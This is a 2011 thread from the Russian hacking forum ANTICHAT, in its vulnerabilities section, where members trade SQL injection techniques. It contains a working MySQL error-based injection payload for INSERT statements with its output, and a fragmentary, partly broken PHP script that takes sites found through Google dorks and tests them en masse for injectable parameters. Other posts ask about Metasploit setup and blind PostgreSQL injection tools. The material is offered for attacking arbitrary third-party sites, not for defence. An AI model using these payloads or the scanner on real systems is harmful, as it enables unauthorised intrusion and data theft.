HOME    FORUMS    MEMBERS    RECENT POSTS    LOG IN  
Баннер 1   Баннер 2

ANTICHAT — форум по информационной безопасности, OSINT и технологиям

ANTICHAT — русскоязычное сообщество по безопасности, OSINT и программированию. Форум ранее работал на доменах antichat.ru, antichat.com и antichat.club, и теперь снова доступен на новом адресе — forum.antichat.xyz.
Форум восстановлен и продолжает развитие: доступны архивные темы, добавляются новые обсуждения и материалы.
⚠️ Старые аккаунты восстановить невозможно — необходимо зарегистрироваться заново.
Вернуться   Форум АНТИЧАТ > БЕЗОПАСНОСТЬ И УЯЗВИМОСТИ > Уязвимости
   
Ответ
 
Опции темы Поиск в этой теме Опции просмотра

  #16441  
Старый 23.02.2011, 22:28
Unknown
Guest
Сообщений: n/a
Провел на форуме:
28895

Репутация: 4
По умолчанию

2Seravin

Можно пару толковых линков по эксплуатации sql inj в инсерт?
 
Ответить с цитированием

  #16442  
Старый 23.02.2011, 22:34
Seravin
Участник форума
Регистрация: 25.11.2009
Сообщений: 201
Провел на форуме:
866555

Репутация: 226
По умолчанию

не помню, смотри в статьях, заодно пока будешь смотреть найдёшь кучу полезного для себя
 
Ответить с цитированием

  #16443  
Старый 23.02.2011, 22:39
~d0s~
Познающий
Регистрация: 17.04.2010
Сообщений: 75
Провел на форуме:
691279

Репутация: 55
По умолчанию

Цитата:
Сообщение от Lijzer  
Lijzer said:
2Seravin
Можно пару толковых линков по эксплуатации sql inj в инсерт?
Выходишь за пределы инсерта values и делаешь подзапрос, остальное рубишь комментом, самое простое.
 
Ответить с цитированием

  #16444  
Старый 24.02.2011, 10:42
krypt3r
Познавший АНТИЧАТ
Регистрация: 27.04.2007
Сообщений: 1,044
Провел на форуме:
3660186

Репутация: 905


По умолчанию

Lijzer, информация к размышлению:

Код:
Code:
insert ... values (...) on duplicate key update parent_name = (select 1 from (select count(*), concat(version(), floor(rand(0) * 2))x from information_schema.tables group by x)a);
ERROR 1062 (23000): Duplicate entry '5.0.771' for key 1
 
Ответить с цитированием

  #16445  
Старый 24.02.2011, 20:47
Slay90
Участник форума
Регистрация: 12.04.2009
Сообщений: 129
Провел на форуме:
150009

Репутация: 14
По умолчанию

есть ли сканеры по доркам, актуальные на данный момент?
 
Ответить с цитированием

  #16446  
Старый 24.02.2011, 21:40
Seravin
Участник форума
Регистрация: 25.11.2009
Сообщений: 201
Провел на форуме:
866555

Репутация: 226
По умолчанию

вот, так сказать, в ознакомительных целях скрипт написанный за пару минут(парсинг гугла откуда то с ачата)

Код:
Code:
]*[Hh][Rr][Ee][Ff][^=]*=[ '\"\n\r\t]*([^ \"'>\r\n\t#]+)[^>]*>/",$html,$a);
        for($x=0; $x 0)
                    //$str = substr($str, 0, $end);
                if(strpos($been, str_replace('www.','',$str)) === false)
                {
                    $been .= $str . '+';                    
                $url = 'http://'.$str;
                if (strpos($url,'?')!==false) {
                $u = parse_url($url);
                $s = '';
                if (preg_match_all('#(.*?)&#',$u['query'],$q)) {
                foreach ($q[1] as $t) $s.=$t."'&";
                $s.=substr($u['query'],strrpos($u['query'],'&')+1,strlen($u['query']))."'";
                }
                else $s = $u['query']."'";
                $page = file_get_contents($url);
                $page1 = file_get_contents($u['scheme'].'://'.$u['host'].'/'.$u['path'].'?'.$s);
                if ($page!==$page2) fputs($f1,$str."\n");                
                }
                }
            }
        }
        Sleep(45);
    }
	}
	flose($f1);
	flose($f);
?>
 
Ответить с цитированием

  #16447  
Старый 24.02.2011, 23:02
Unknown
Guest
Сообщений: n/a
Провел на форуме:
28895

Репутация: 4
По умолчанию

Ребят поставил metasploit framework, захожу в консоль пишу

msf > db_connect db_connect msf3:55adaf65@127.0.0.1:5432

в ответ

[-] Error while running command db_connect: Failed to connect to the database: could not connect to server: Connection refused (0x0000274D/10061)

Is the server running on host "127.0.0.1" and accepting

TCP/IP connections on port 5432?

Что делать?

p.s. имя юзера и пасс брал /config/database.yml, проштудировал гугл ответа не нашел.

>>> разобрался, ответ нашел тут http://forums.enterprisedb.com/posts/list/1961.page
 
Ответить с цитированием

  #16448  
Старый 25.02.2011, 16:09
zlo12
Постоянный
Регистрация: 28.12.2007
Сообщений: 328
Провел на форуме:
3054717

Репутация: 170
Отправить сообщение для zlo12 с помощью ICQ
По умолчанию

есть какие-нибудь проги для упрощения Blind PostgreSQL инъекций?
 
Ответить с цитированием

  #16449  
Старый 25.02.2011, 17:32
Slay90
Участник форума
Регистрация: 12.04.2009
Сообщений: 129
Провел на форуме:
150009

Репутация: 14
По умолчанию

Цитата:
Сообщение от Seravin  
Seravin said:
вот, так сказать, в ознакомительных целях скрипт написанный за пару минут(парсинг гугла откуда то с ачата)
Код:
Code:
]*[Hh][Rr][Ee][Ff][^=]*=[ '\"\n\r\t]*([^ \"'>\r\n\t#]+)[^>]*>/",$html,$a);
        for($x=0; $x 0)
                    //$str = substr($str, 0, $end);
                if(strpos($been, str_replace('www.','',$str)) === false)
                {
                    $been .= $str . '+';                    
                $url = 'http://'.$str;
                if (strpos($url,'?')!==false) {
                $u = parse_url($url);
                $s = '';
                if (preg_match_all('#(.*?)&#',$u['query'],$q)) {
                foreach ($q[1] as $t) $s.=$t."'&";
                $s.=substr($u['query'],strrpos($u['query'],'&')+1,strlen($u['query']))."'";
                }
                else $s = $u['query']."'";
                $page = file_get_contents($url);
                $page1 = file_get_contents($u['scheme'].'://'.$u['host'].'/'.$u['path'].'?'.$s);
                if ($page!==$page2) fputs($f1,$str."\n");                
                }
                }
            }
        }
        Sleep(45);
    }
	}
	flose($f1);
	flose($f);
?>
PHP Warning: fopen(dorks.txt): failed to open stream: No such file or directory in C:\Program Files\PHP\1.php on line 2

PHP Warning: feof(): supplied argument is not a valid stream resource in C:\Program Files\PHP\1.php on line 4

PHP Warning: fgets(): supplied argument is not a valid stream resource in C:\Program Files\PHP\1.php on line 5

не работает скрипт =\
 
Ответить с цитированием

  #16450  
Старый 25.02.2011, 17:49
Seravin
Участник форума
Регистрация: 25.11.2009
Сообщений: 201
Провел на форуме:
866555

Репутация: 226
По умолчанию

значит пока рано тебе этот скрипт использовать
 
Ответить с цитированием
Ответ



Похожие темы
Тема Автор Раздел Ответов Последнее сообщение
Ваши ламерские приколы (Ну когда только комп появился) PEPSICOLA Болталка 188 23.05.2010 10:05
Ваши любимые компьютерные игры PEPSICOLA Болталка 280 19.08.2009 00:01
Ваши телеги... F-IFTY Болталка 13 18.08.2009 18:22
Вопросы по Ipb 2.0 Voodoo_People Уязвимости CMS / форумов 26 15.02.2005 22:57



Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
 


Быстрый переход




ANTICHAT.XYZ